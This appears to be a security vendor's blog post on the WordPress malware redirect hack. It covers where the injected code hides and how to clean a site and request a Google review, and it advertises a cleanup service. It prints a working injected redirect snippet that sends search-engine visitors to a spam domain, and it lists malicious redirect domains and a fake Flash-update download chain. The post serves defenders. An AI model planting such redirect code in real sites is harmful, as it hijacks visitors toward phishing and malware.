WordPress Malware Redirect Hack ☠️ How To Detect & Fix It

4.7 (93.33%) 3 votes

detect-clean-wordpress-malware-redirect

WordPress Redirect Hack – Malware Removal & Cleanup 🚨

 TABLE OF CONTENTS:

📒 Does Your WordPress Website Redirects To Spammy Site?

📒 What is WordPress Malware Redirect Hack?

📒 Instance Of Malicious Codes Inserted in WordPress sites

📒 How to Detect and Clean WordPress Redirect Hack?

📒 How to Protect your site from WordPress Malware Redirects?

📒 WordPress Malware Cleanup Service – WP Hacked Help

wordpress malware redirect hack cleanup Does your WordPress website redirects to spammy site?

No one is 100% safe from having their website hacked (⚠️even the FBI’s website gets hacked). Hacking is common yet one of the most common devastating experience for the website owners.

These hackers may make out money, data and confidential information from your website. If in any case, your website is being redirected to phishing or malware websites then get ready for the consequences.

Yes, of course, Google is not going to take any chance with its reputation and you are definitely going to be penalized by Google maybe your website gets blacklisted. So, it’s very important to know what should be done right away when you see your site is being redirected to phishing or malware websites.

WordPress Redirect HackWhat is WordPress Malware Redirect Hack?

Visitor redirecting to spammy site

A🚨 “WordPress Malware Redirect” or “WordPress Redirect Hack” as it is commonly used, is a hack where your site visitors are automatically redirected to malicious websites, phishing pages and malware websites. It is likely due to the code injected in your WordPress database, this lead your WordPress site to redirect to another site.

Generally, a 🔴malicious WordPress redirect is detected through the site’s front end when a visitor is redirected to any other page instead of the page or any website he requested. In most of the cases hackers use a particular script to redirect the website to a porn or scam website to harm your website and put the popularity at stake. Commonly used tricks to change the website’s redirection includes:

  • Can add themselves as a ghost admin on your website
  • Can inject or upload a malicious code in your WordPress site
  • Can execute .php code

If any malicious script is added by hackers it’s often named to look like a legitimate file like that’s the part of WordPress core files on the website. Hackers can add malicious code to wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or wp-config.php file.

Clean WordPress Malware Redirect Few Malicious Codes Inserted in WordPress sites?

WordPress Hacked spammy Redirect

If your WordPress website is infected with malicious redirects, check the following areas for suspicious code:

  • Core WordPress Files
  • index.php
  • index.html
  • .htaccess file
  • theme files
  • header.php (in the themes folder)
  • footer.php (in the themes folder)
  • functions.php (in the themes folder)

Few instances of malicious code presence which resulted in randomly redirects visitors to malicious sites on hacked WordPress sites.

Header.php Injection

In general, the malicious code of 10 to 12 lines is inserted in header.php of the WordPress website.

 malware-code-decoded

When this code is decoded the main part of the malware looks somewhat like this:

 malware-code-decoded

There is a logic behind the code. It will simply redirect the visitors to default7.com if in case it’s the first visit then it can set 896diC9OFnqeAcKGN7fW cookie for 1 year approx. to track the returning visitors.

  • Malicious code inserted in footer
  • Malicious code inserted in themes header.php file

Malicious code

echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>

Depending on the browser and IP a user can be redirected to any random domain listed below

  • test0 .com
  • distinctfestive .com
  • default7 .com
  • ableoccassion .com
  • test246 .com
  • 404.php
  • Bugs in the Malware

There are various other effects of this malware that are somehow caused by few obvious bugs in the malicious code.

For example, see this line #9 in the decoded version

if ($_GET[‘6FoNxbvo73BHOjhxokW3‘] !== NULL) {

For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter, generally can’t do anything if a GET requests contains it. It’s not a problem though. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:

Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()’d code on line 9

  • Fake Updates for Internet Explorer Users

fake-adobe-flash-update-random redirects to malicious site

The strange case is when you use Internet Explorer the redirect chain may somewhat look like this:

default7 .com
-> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r=
-> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk.
-> intva31 .saturnlibrary .info/dl-pure/1202331/31254524/?bc=1202331&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202245&stub=true

This code leads to the websites that push fake java and flash player updates on your screen. see above attached screenshot for reference.

WordPress Hacked Redirect, How to Detect and Clean it

Detect and clean Redirect HackHow to detect and clean WordPress Redirect Hack?

Steps to be taken before fixing the hack

  • Before you start fixing the WordPress malware redirect hack, ensure your website is temporarily put offline. By doing this you can have enough time to solve the problem and also prevent your users from visiting the hacked pages.
  • Always take a backup before making any changes in the core files and the database of the website. The backup should also contain the hacked pages and can be be referred in case the necessary content is accidentally removed. Also, be surer to keep a copy of all the files that you work with.
  • In case you have less knowledge about JavaScript, CMS or PHP files of your website, it’s strictly recommended to consult a professional to deal with the issue.

Follow this simple 5-Step guide to remove the malicious code from your WordPress Website :

remove malicious code from WordPressScan Your WordPress Site

There are various ways of checking your site and in any case you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While cleaning your site you might make any mistake and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using a WordPress Malware Scanner.

Wordpress Malware Scanner

Find the Malicious CodeFind the Malicious Code

There are number of places where you can locate the malicious code on your website. We understand it’s definitely not an easy task to scan the code chunk by chunk in each page of your website. There are times when the culprit can be enclosed somewhere in your server. And for few places you’ll need ftp/ftps login details to get access to these places to start the malware cleaning process.

website is redirecting

  • In case, the website is redirecting to an anonymous website(s), then look for the suspicious code in the following areas:

    • check both index.php and index.html!
    • .htaccess file
  • In case your website is triggering visitors for downloads, please have a look at out the following places:
    • Header.php
    • Footer.php
    • Your website’s index file (Check both)
    • Your theme’s files

Deeper Dig in the website

At times there is no harm in running tests to analyse whether your website is infected with a malware/malicious code or not. For this, you can use any test to pretend you’re a user agent or Google bot using a googlebot simulator or you can also use FETCH AS GOOGLE from the website’s webmaster console. There are few commands that work through ssh client. By employing certain code you can look into that place where the hacking has been done and further can remove the WordPress malicious code manually. [📒 Also Read How to Scan & Detect Malware in WordPress Themes ]

Remove URL search consoleRemoving Bad Code

You’ll need to remove the malicious scripts that causes website redirection to the abusive sites. The malicious code with the new pages can be removed from the Search Engine Results together by using the remove URLs feature and by going to Google’s Search Engine Console. Also, update the plugins, themes and ensure the new core theme is installed plus up-to-date. Change or reset the passwords.

 

Request Removal search console

Malware reconsideration requestSubmit Malware reconsideration request using Search console

Google Webmaster tool is one of the best tool for webmaster which you can get for free, and if you have not yet submitted your Website in GWT, you are missing out many vital information regarding your website. Here I’m sharing step by step guide to put malware review request using Google Webmaster tool:

  • Login to Google search console
  • Verify your Website ownership
  • Click on Site > Dashboard > Security issue

Here you will see list of URL, google is suspecting that is infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on request a review, and add notes in the form of actions you have taken to remove the malware.

Malware-review-request-google-webmasters

harden your WordPress securityHow to Protect your site from WordPress Malware Redirects?

It’s important to📒 harden your WordPress security by following the guidelines listed below:


🛡️WordPress Malware Cleanup Service – WP Hacked Help🛡️

If you don’t have time or the expertise to scan and clean your WordPress site from a Malware Redirect hack then we can clean it for you. This is a priority service that will restore your Hacked WordPress Website in a day or less. We take 📒wordpress database backup manually & scan your entire site to ensure all malware is deleted, and all infected and vulnerable files are replaced with fresh, secure copies.

Our WordpPress Malware Removal service helps to remove all malware, wordpress backdoors, Google blacklist warning, and protection against future attacks.

Our WordPress security services such as malware removal, hack recovery, hardening, WordPress updates and more.

Fix Hacked WordPress Website & Remove Malware -

 

Leave a Reply

Your email address will not be published. Required fields are marked *